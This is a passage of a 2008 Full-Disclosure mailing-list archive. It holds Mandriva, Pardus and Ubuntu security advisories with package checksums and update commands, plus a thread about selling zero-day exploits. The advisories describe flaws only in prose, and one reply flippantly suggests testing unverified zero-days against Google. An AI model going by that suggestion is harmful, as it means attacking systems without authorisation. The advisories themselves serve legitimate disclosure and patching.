 745b2535260294c01243e065a0e9b6cd  2009.0/x86_64/gnbd-kernel-server-latest-2.03.07-1.20081103.2mdv2009.0.x86_64.rpm
 8e5f0ce165e2ca8cdb4d1e08b402e7d1  2009.0/x86_64/hsfmodem-kernel-2.6.27.4-desktop-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm
 39af5b80488bf883f0ee3bbb62025eb2  2009.0/x86_64/hsfmodem-kernel-2.6.27.4-server-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm
 c377b77e2cd7aae40f07aa5cf41c6d9a  2009.0/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20081103.1mdv2009.0.x86_64.rpm
 f21246718d60ccef70da23e5ce6bc6b5  2009.0/x86_64/hsfmodem-kernel-server-latest-7.68.00.13-1.20081103.1mdv2009.0.x86_64.rpm
 3ef5f09024a0c13092ef3898ed348b14  2009.0/x86_64/hso-kernel-2.6.27.4-desktop-1mnb-1.2-2mdv2009.0.x86_64.rpm
 fb21951b4951dcb958643fc214a3b90f  2009.0/x86_64/hso-kernel-2.6.27.4-server-1mnb-1.2-2mdv2009.0.x86_64.rpm
 de4755de3c16cdcd63428c1857e03fb9  2009.0/x86_64/hso-kernel-desktop-latest-1.2-1.20081103.2mdv2009.0.x86_64.rpm
 1862c1524f0dabc1be563171978bec1d  2009.0/x86_64/hso-kernel-server-latest-1.2-1.20081103.2mdv2009.0.x86_64.rpm
 7f06103920f1b0bee5bd46ef7ee35a32  2009.0/x86_64/iscsitarget-kernel-2.6.27.4-desktop-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
 a76a34ea9903d6555d91109692505581  2009.0/x86_64/iscsitarget-kernel-2.6.27.4-server-1mnb-0.4.16-4mdv2009.0.x86_64.rpm
 9a4499e2390892cf38b59df9ef3d35de  2009.0/x86_64/iscsitarget-kernel-desktop-latest-0.4.16-1.20081103.4mdv2009.0.x86_64.rpm
 98eb6870421f1448471196b077d797ad  2009.0/x86_64/iscsitarget-kernel-server-latest-0.4.16-1.20081103.4mdv2009.0.x86_64.rpm
 c7c842aec494f3e38c261506c0547223  2009.0/x86_64/kernel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 4b8766c11f016d1dadf6f2d8e795b0fb  2009.0/x86_64/kernel-desktop-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 5478882b39f0cc7cd05e6df8851bf61e  2009.0/x86_64/kernel-desktop-devel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 de8802b59abbc0e6153916a2669451cf  2009.0/x86_64/kernel-desktop-devel-latest-2.6.27.4-1mnb2.x86_64.rpm
 81c95cef55a8b48bb7d283e384bb2c24  2009.0/x86_64/kernel-desktop-latest-2.6.27.4-1mnb2.x86_64.rpm
 4523744b73600713bea980f973edb93a  2009.0/x86_64/kernel-doc-2.6.27.4-1mnb2.x86_64.rpm
 9acc26af4d76f58a63de3759e9182955  2009.0/x86_64/kernel-server-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 1556e73969387b60c30590b695a9c9ed  2009.0/x86_64/kernel-server-devel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 22e12d01ab37f52241a2855713d90739  2009.0/x86_64/kernel-server-devel-latest-2.6.27.4-1mnb2.x86_64.rpm
 0bc0e4758708747635e8bfb1aab7c7bd  2009.0/x86_64/kernel-server-latest-2.6.27.4-1mnb2.x86_64.rpm
 f07b5b02fc4a21102e614e749500ae57  2009.0/x86_64/kernel-source-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm
 3ad3eb3d2d8990ebe3404283aac6feb7  2009.0/x86_64/kernel-source-latest-2.6.27.4-1mnb2.x86_64.rpm
 87229f3144e2dba7ccf70b046569b89b  2009.0/x86_64/kqemu-kernel-2.6.27.4-desktop-1mnb-1.4.0pre1-0.x86_64.rpm
 4e1f98f6c792b13b5e0dad893336df23  2009.0/x86_64/kqemu-kernel-2.6.27.4-server-1mnb-1.4.0pre1-0.x86_64.rpm
 4044a616b6421bb8fc7b806025ea1da4  2009.0/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20081103.0.x86_64.rpm
 cd464e39c45d8f3e6618c423fbe76df1  2009.0/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20081103.0.x86_64.rpm
 df8a7b72d394b1f800809a7d51f88ca5  2009.0/x86_64/lirc-kernel-2.6.27.4-desktop-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
 e8bb52fe06e4fce19876d66a3b298564  2009.0/x86_64/lirc-kernel-2.6.27.4-server-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm
 177902f579887379aed116e473f7af77  2009.0/x86_64/lirc-kernel-desktop-latest-0.8.3-1.20081103.4.1mdv2009.0.x86_64.rpm
 a397527b920d758f326e541c6da06226  2009.0/x86_64/lirc-kernel-server-latest-0.8.3-1.20081103.4.1mdv2009.0.x86_64.rpm
 6ea88859285111f130ec7b143dfbf5f6  2009.0/x86_64/lzma-kernel-2.6.27.4-desktop-1mnb-4.43-24mdv2009.0.x86_64.rpm
 4b6268dfa3da64fedbe17a2cc63696db  2009.0/x86_64/lzma-kernel-2.6.27.4-server-1mnb-4.43-24mdv2009.0.x86_64.rpm
 00e1af05edc796db266ed190e728efff  2009.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20081103.24mdv2009.0.x86_64.rpm
 8b989058f9507cac3a665e8ba6e7c4ac  2009.0/x86_64/lzma-kernel-server-latest-4.43-1.20081103.24mdv2009.0.x86_64.rpm
 4164681efe2b2c20fff089f8c6b73fa6  2009.0/x86_64/madwifi-kernel-2.6.27.4-desktop-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 bb1ff664073b5da730be99650be7e58d  2009.0/x86_64/madwifi-kernel-2.6.27.4-server-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm
 945b737037f6cc7be4778d1e59c17b76  2009.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20081103.3.r3835mdv2009.0.x86_64.rpm
 11b82f73622f3da01305f477b2263429  2009.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20081103.3.r3835mdv2009.0.x86_64.rpm
 353a3a440247a94b89d9a2043ec5ab6a  2009.0/x86_64/nvidia173-kernel-2.6.27.4-desktop-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 a4c8004cfef6afbb27e4accba7cea8bb  2009.0/x86_64/nvidia173-kernel-2.6.27.4-server-1mnb-173.14.12-4mdv2009.0.x86_64.rpm
 dc7264b488daf2c7f2e27fe2896a093e  2009.0/x86_64/nvidia173-kernel-desktop-latest-173.14.12-1.20081103.4mdv2009.0.x86_64.rpm
 318fda8e08f60f18f9e18e8d1ece5b46  2009.0/x86_64/nvidia173-kernel-server-latest-173.14.12-1.20081103.4mdv2009.0.x86_64.rpm
 551a4d1c93b31b60d53a2d7c932766ee  2009.0/x86_64/nvidia71xx-kernel-2.6.27.4-desktop-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 aaf2925ad1c9f7e23027d830c6b4b149  2009.0/x86_64/nvidia71xx-kernel-2.6.27.4-server-1mnb-71.86.06-5mdv2009.0.x86_64.rpm
 597f72e74de27308c94a1f3c6d387f1d  2009.0/x86_64/nvidia71xx-kernel-desktop-latest-71.86.06-1.20081103.5mdv2009.0.x86_64.rpm
 ff65f397ce63ae9cc6f06834f5d8b0c6  2009.0/x86_64/nvidia71xx-kernel-server-latest-71.86.06-1.20081103.5mdv2009.0.x86_64.rpm
 f9c4833bccb538809790bd3423b7cb40  2009.0/x86_64/nvidia96xx-kernel-2.6.27.4-desktop-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 b051687d4d953ab011c5f3ff0f28a441  2009.0/x86_64/nvidia96xx-kernel-2.6.27.4-server-1mnb-96.43.07-5mdv2009.0.x86_64.rpm
 59e1b97e5003d7c626e900ef596a76b5  2009.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.07-1.20081103.5mdv2009.0.x86_64.rpm
 e2fe3240f11b23556e7d486691c978b0  2009.0/x86_64/nvidia96xx-kernel-server-latest-96.43.07-1.20081103.5mdv2009.0.x86_64.rpm
 37164772860f8ff6164c18c8f0fb3cb0  2009.0/x86_64/nvidia-current-kernel-2.6.27.4-desktop-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 fe08b175f9986da8db5c1901a09de1d3  2009.0/x86_64/nvidia-current-kernel-2.6.27.4-server-1mnb-177.70-2.3mdv2009.0.x86_64.rpm
 d9182de2d4ec00a58b6ee1d34093892f  2009.0/x86_64/nvidia-current-kernel-desktop-latest-177.70-1.20081103.2.3mdv2009.0.x86_64.rpm
 66301b0d7d866d345069607e868332da  2009.0/x86_64/nvidia-current-kernel-server-latest-177.70-1.20081103.2.3mdv2009.0.x86_64.rpm
 eb57129d77fdd68cf5b597e47a168640  2009.0/x86_64/omfs-kernel-2.6.27.4-desktop-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 c84c1c2780cadd494b50d23f37d6bb93  2009.0/x86_64/omfs-kernel-2.6.27.4-server-1mnb-0.8.0-1mdv2009.0.x86_64.rpm
 3517951f78740e235501c29303d9ed2f  2009.0/x86_64/omfs-kernel-desktop-latest-0.8.0-1.20081103.1mdv2009.0.x86_64.rpm
 6964d1f8a5eacad06961e619782a5676  2009.0/x86_64/omfs-kernel-server-latest-0.8.0-1.20081103.1mdv2009.0.x86_64.rpm
 f9fa126b5ff0be631ca701e7009c1622  2009.0/x86_64/omnibook-kernel-2.6.27.4-desktop-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 5c8bbcae3ae10b8b1c5f76dfe55ddf8e  2009.0/x86_64/omnibook-kernel-2.6.27.4-server-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm
 27e65bbde30effada6111ed2fbe69851  2009.0/x86_64/omnibook-kernel-desktop-latest-20080513-1.20081103.0.274.1mdv2009.0.x86_64.rpm
 e917a54771478c9f796f228dc3ed3ec6  2009.0/x86_64/omnibook-kernel-server-latest-20080513-1.20081103.0.274.1mdv2009.0.x86_64.rpm
 ae4d4ff7ae9ff50a2e9c9b77fe51c341  2009.0/x86_64/opencbm-kernel-2.6.27.4-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 e9eabb741feb646f18021f05e15c2f1e  2009.0/x86_64/opencbm-kernel-2.6.27.4-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm
 c23326a1caad7188410644ad898c6514  2009.0/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20081103.1mdv2008.1.x86_64.rpm
 cbaede32fa76450f078bb189bd22f026  2009.0/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20081103.1mdv2008.1.x86_64.rpm
 3da3fc21d794a4325a1594ffe5602f03  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.4-desktop-1mnb-1.5.8-1mdv2009.0.x86_64.rpm
 a3f2d334dbff55bffe9a90d01f412614  2009.0/x86_64/ov51x-jpeg-kernel-2.6.27.4-server-1mnb-1.5.8-1mdv2009.0.x86_64.rpm
 f40cb8ea083591bfcdd969b76f88c530  2009.0/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.8-1.20081103.1mdv2009.0.x86_64.rpm
 e478caed49e01f39e102db014ac542bd  2009.0/x86_64/ov51x-jpeg-kernel-server-latest-1.5.8-1.20081103.1mdv2009.0.x86_64.rpm
 e522757aa731ac88295456b5566d61b4  2009.0/x86_64/qc-usb-kernel-2.6.27.4-desktop-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 2f2d1a2663d8153ddffd0f0ffb12afa1  2009.0/x86_64/qc-usb-kernel-2.6.27.4-server-1mnb-0.6.6-6mdv2009.0.x86_64.rpm
 e5869f4d7b2fd99c063845c9a32f7bd6  2009.0/x86_64/qc-usb-kernel-desktop-latest-0.6.6-1.20081103.6mdv2009.0.x86_64.rpm
 cf9ab9f42b28b6ce14e046fdff66bf1d  2009.0/x86_64/qc-usb-kernel-server-latest-0.6.6-1.20081103.6mdv2009.0.x86_64.rpm
 6d6e3c56aba0b8780ca1ffc55478e818  2009.0/x86_64/rt2860-kernel-2.6.27.4-desktop-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 5dae92c188d824164ec11c07168c2b20  2009.0/x86_64/rt2860-kernel-2.6.27.4-server-1mnb-1.7.0.0-2mdv2009.0.x86_64.rpm
 04ca954317a0cf92f2fcadd7ca021b81  2009.0/x86_64/rt2860-kernel-desktop-latest-1.7.0.0-1.20081103.2mdv2009.0.x86_64.rpm
 20151fefd09ab6d9b4fc1a6461acd27b  2009.0/x86_64/rt2860-kernel-server-latest-1.7.0.0-1.20081103.2mdv2009.0.x86_64.rpm
 d458447ed4491b4a1340cbc493f17a96  2009.0/x86_64/rt2870-kernel-2.6.27.4-desktop-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 bf0d25daf284f15bec45cf2eac0474ac  2009.0/x86_64/rt2870-kernel-2.6.27.4-server-1mnb-1.3.1.0-2mdv2009.0.x86_64.rpm
 1ee8da58af175e7f9c5b5a683deb2224  2009.0/x86_64/rt2870-kernel-desktop-latest-1.3.1.0-1.20081103.2mdv2009.0.x86_64.rpm
 84eddcb8928d7d3f17e93b48dd450537  2009.0/x86_64/rt2870-kernel-server-latest-1.3.1.0-1.20081103.2mdv2009.0.x86_64.rpm
 ded3f3ad8dcb2d95ada249bffdc459af  2009.0/x86_64/rtl8187se-kernel-2.6.27.4-desktop-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 a95bf4674b190345d168ba34a5315638  2009.0/x86_64/rtl8187se-kernel-2.6.27.4-server-1mnb-1016.20080716-1.1mdv2009.0.x86_64.rpm
 44e8a81fbbc523073be6b497c0aea70d  2009.0/x86_64/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081103.1.1mdv2009.0.x86_64.rpm
 b15d9da2bcfcdc939b569eb3a26d6ad1  2009.0/x86_64/rtl8187se-kernel-server-latest-1016.20080716-1.20081103.1.1mdv2009.0.x86_64.rpm
 252210488c17f5843ffc0c1811617f45  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.4-desktop-1mnb-3.3-5mdv2009.0.x86_64.rpm
 d3efb5f053857de32eafb702c80e008b  2009.0/x86_64/squashfs-lzma-kernel-2.6.27.4-server-1mnb-3.3-5mdv2009.0.x86_64.rpm
 3dc075354ee335acc04b0f28f9586dee  2009.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20081103.5mdv2009.0.x86_64.rpm
 1cf9db1edb915488fb02841303b94902  2009.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20081103.5mdv2009.0.x86_64.rpm
 49467f7f7c25ccff992614d33bc9a207  2009.0/x86_64/tp_smapi-kernel-2.6.27.4-desktop-1mnb-0.37-2mdv2009.0.x86_64.rpm
 b2a2f14e874055b0553380deee70f9c7  2009.0/x86_64/tp_smapi-kernel-2.6.27.4-server-1mnb-0.37-2mdv2009.0.x86_64.rpm
 b9a2506a07408440b6456186066b25c8  2009.0/x86_64/tp_smapi-kernel-desktop-latest-0.37-1.20081103.2mdv2009.0.x86_64.rpm
 1606e9107ab19e3b1bc723cecb3a3a22  2009.0/x86_64/tp_smapi-kernel-server-latest-0.37-1.20081103.2mdv2009.0.x86_64.rpm
 26eb20dd516fb56e5fc2bc85c468acb3  2009.0/x86_64/vboxadd-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 281a1f616ae6ebfd1af79c69b4f8b77a  2009.0/x86_64/vboxadd-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 e57c22c163de7e938a66d1efd81663a5  2009.0/x86_64/vboxadd-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 11c7c493aac70eec3e188d3574a078c0  2009.0/x86_64/vboxadd-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 a0f162518b8c04753ae4e785fd2978ac  2009.0/x86_64/vboxvfs-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 1ed0653d5b54362b0d5fd888651e128a  2009.0/x86_64/vboxvfs-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 d332d49cea0865a6e94273b0b14378fe  2009.0/x86_64/vboxvfs-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 5b04b7459c3637356a55736a0cae9a0d  2009.0/x86_64/vboxvfs-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 3943402f1e675768815e97c656a5e0d1  2009.0/x86_64/vhba-kernel-2.6.27.4-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 7118d4a43026737ef9a0666ff0c9c7de  2009.0/x86_64/vhba-kernel-2.6.27.4-server-1mnb-1.0.0-1.svn304.1mdv2009.0.x86_64.rpm
 f8be2df68fdd9d17697b86b04309955b  2009.0/x86_64/vhba-kernel-desktop-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.x86_64.rpm
 0c9e98c4338c3e400298b7f587295777  2009.0/x86_64/vhba-kernel-server-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.x86_64.rpm
 5d9fd65787dd2f4dbc4b6d43da40a2f7  2009.0/x86_64/virtualbox-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 5d5e884838fe2a0f6445148294cce0a5  2009.0/x86_64/virtualbox-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.x86_64.rpm
 dee1552ee9b94bd240bf628c00367ca7  2009.0/x86_64/virtualbox-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 b127c79624400cedb2b5997ada71b1ed  2009.0/x86_64/virtualbox-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.x86_64.rpm
 c5ad795c2bf9bf4700833186a03b177b  2009.0/x86_64/vpnclient-kernel-2.6.27.4-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 b6cec47d9766671067d622c25a0b21e9  2009.0/x86_64/vpnclient-kernel-2.6.27.4-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm
 dd166ad80893f23d91008810f4a25e94  2009.0/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081103.3mdv2009.0.x86_64.rpm
 baca1d77583f4a42f3c3fa322e87d978  2009.0/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20081103.3mdv2009.0.x86_64.rpm 
 b154ea6c4d96dfa8e57773bd90ab7347  2009.0/SRPMS/kernel-2.6.27.4-1mnb2.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJEK5ymqjQ0CJFipgRAlYpAJ9Pyu7NRG546FCKq56cpXl/nOuvsgCfYAXk
gNmHaiMeh1Y4haxmYdTFjNA=
=eUBO
-----END PGP SIGNATURE-----



From pinar at pardus.org.tr  Wed Nov  5 06:46:38 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Wed, 05 Nov 2008 08:46:38 +0200
Subject: [Full-disclosure] [PLSA 2008-65] net-snmp: Denial of Service
Message-ID: <4911414E.2040900@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-65            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 2
      Type: Remote
------------------------------------------------------------------------

Summary
=======

A bug in the getbulk handling code could let anyone with  even  minimal 
access crash the agent. 


Description
===========

The getbulk code in net-snmp 5.4 before 5.4.2.1, 5.3 before 5.3.2.3, and
5.2 before 5.2.5.1 allows remote attackers to cause a denial of service 
(crash) via vectors related to the number of responses or repeats. 


Affected packages:

  Pardus 2008:
    net-snmp, all before 5.4.1-7-3
    net-snmptrap, all before 5.4.1-7-3



Resolution
==========

There are update(s) for net-snmp, net-snmptrap. You can update them via 
Package Manager or with a single command from console: 

    pisi up net-snmp net-snmptrap

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8577
  * http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4309

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From pinar at pardus.org.tr  Wed Nov  5 06:45:31 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Wed, 05 Nov 2008 08:45:31 +0200
Subject: [Full-disclosure] [PLSA 2008-62] Smarty: Security Bypass
Message-ID: <4911410B.1030907@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-62            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 1
      Type: Remote
------------------------------------------------------------------------

Summary
=======

A vulnerability has been reported in Smarty, which can be exploited  by 
malicious people to bypass certain security restrictions. 


Description
===========

The vulnerability is caused due to an error when processing  data  with 
embedded  variables. This  can  be  exploited  to  potentially  execute 
arbitrary PHP code. 



Affected packages:

  Pardus 2008:
    Smarty, all before 2.6.20-6-3


Resolution
==========

There are update(s) for Smarty. You can update them via Package Manager 
or with a single command from console: 

    pisi up Smarty

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8567
  * http://code.google.com/p/smarty-php/source/diff?spec=svn2797&r=2797&format=side&path=/trunk/libs/Smarty_Compiler.class.php
  * http://smarty-php.googlecode.com/svn/trunk/NEWS

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From pinar at pardus.org.tr  Wed Nov  5 06:44:35 2008
From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=)
Date: Wed, 05 Nov 2008 08:44:35 +0200
Subject: [Full-disclosure] [PLSA 2008-61] Ktorrent: Security Bypass
Message-ID: <491140D3.1040103@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-61            security at pardus.org.tr
------------------------------------------------------------------------
      Date: 2008-11-05
  Severity: 1
      Type: Remote
------------------------------------------------------------------------

Summary
=======

Some vulnerabilities have been discovered in  KTorrent,  which  can  be 
exploited by malicious users to  compromise  a  vulnerable  system  and 
malicious people to bypass certain security restrictions. 


Description
===========

1) The web interface plugin does not properly restrict  access  to  the 
torrent upload functionality. This can be exploited to upload arbitrary 
torrent files by sending specially crafted HTTP  POST  request  to  the 
affected application. 



2)  The web  interface  plugin  does  not  properly  sanitise  request  
parameters before passing them to the  PHP  interpreter.  This  can  be 
exploited to inject and execute arbitrary PHP code by passing specially 
crafted parameters to the PHP scripts of the web interface. 



Successful exploitation of the vulnerabilities requires  that  the  web 
interface plugin is enabled (not the default setting). 


Affected packages:

  Pardus 2008:
    ktorrent, all before 2.2.7-30-4


Resolution
==========

There are update(s) for ktorrent.  You  can  update  them  via  Package 
Manager or with a single command from console: 

    pisi up ktorrent

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8566
  * http://secunia.com/advisories/32442/

------------------------------------------------------------------------

-- 
Pardus Security Team
http://security.pardus.org.tr




From nytrokiss at gmail.com  Wed Nov  5 08:30:02 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Wed, 5 Nov 2008 10:30:02 +0200
Subject: [Full-disclosure] Odays offers
In-Reply-To: <BLU128-W38BD4B20DD2D6858D1907FF01C0@phx.gbl>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
	<6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>
	<282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk>
	<cb7d6d2e0811040148w5fbf7071j5be3d3f51a4a087@mail.gmail.com>
	<4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
	<BLU128-W38BD4B20DD2D6858D1907FF01C0@phx.gbl>
Message-ID: <8a6b8e350811050030l13881d56y96954e013a4f86fa@mail.gmail.com>

Test them against google and see if they work?

On Tue, Nov 4, 2008 at 11:54 PM, John Allison <geeky.one at hotmail.com> wrote:

>  Why would a Whitehat want zone-h shutdown?  That makes no sense at all.
>
> > Date: Tue, 4 Nov 2008 13:57:56 +0000
> > From: xploitable at gmail.com
> > To: full-disclosure at lists.grok.org.uk
> > Subject: Re: [Full-disclosure] Odays offers
> >
> > now maybe he should shut down his zone-h site as well and keep
> > whitehats happy :)
> >
> > On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
> > <badzmanaois at gmail.com> wrote:
> > > sell 'em at wabisabilabi.
> > >
> > > ops, too late:
> > >
> > > http://www.techworld.com/security/news/index.cfm?newsID=106294
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ------------------------------
> Store, manage and share up to 5GB with Windows Live SkyDrive. Start
> uploading now<http://skydrive.live.com/welcome.aspx?provision=1?ocid=TXT_TAGLM_WL_skydrive_102008>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081105/525aeaae/attachment.html 

From kees at ubuntu.com  Wed Nov  5 09:52:53 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 5 Nov 2008 01:52:53 -0800
Subject: [Full-disclosure] [USN-662-1] Linux kernel vulnerabilities
Message-ID: <20081105095253.GO9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-662-1          November 05, 2008
linux vulnerability
CVE-2008-3528, CVE-2008-4395
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  linux-image-2.6.27-7-generic    2.6.27-7.16
  linux-image-2.6.27-7-server     2.6.27-7.16
  linux-image-2.6.27-7-virtual    2.6.27-7.16

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

It was discovered that the Linux kernel could be made to hang temporarily
when mounting corrupted ext2/3 filesystems.  If a user were tricked into
mounting a specially crafted filesystem, a remote attacker could cause
system hangs, leading to a denial of service. (CVE-2008-3528)

Anders Kaseorg discovered that ndiswrapper did not correctly handle long
ESSIDs.  For a system using ndiswrapper, a physically near-by attacker
could generate specially crafted wireless network traffic and execute
arbitrary code with root privileges. (CVE-2008-4395)


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-7.16.diff.gz
      Size/MD5:  2863888 b1052e6aee92d46c4145620b1b8e65ee
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-7.16.dsc
      Size/MD5:     1513 28e5b4d99b4ff47bdd31a7c7c125c3d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-7.16_all.deb
      Size/MD5:  3469330 aa00f7f555299257767ee8bf5d2bd08f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-7_2.6.27-7.16_all.deb
      Size/MD5:  5770686 3f4d5517ab70ac57766244843b06bc24
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-7.16_all.deb
      Size/MD5: 51951896 db1f17d562bb0c31e5fd2839dd5538a1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    36502 7aaa51517f74f727cd9b247ad3bdf241
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:   263916 ffd1d0223f84312694b853ddcc3f6f2a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    53480 736c4c1f8c1b69408dcef471031af2c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    43114 86d52a39e37574f906424b6bcfb9132e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    52364 9e6193a120fd97f0f22eda94ca65d49b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-7-generic-di_2.6.27-7.16_amd64.udeb
      Size/MD5:    89712 75b58dda7c91a14f102dd513a9884b91
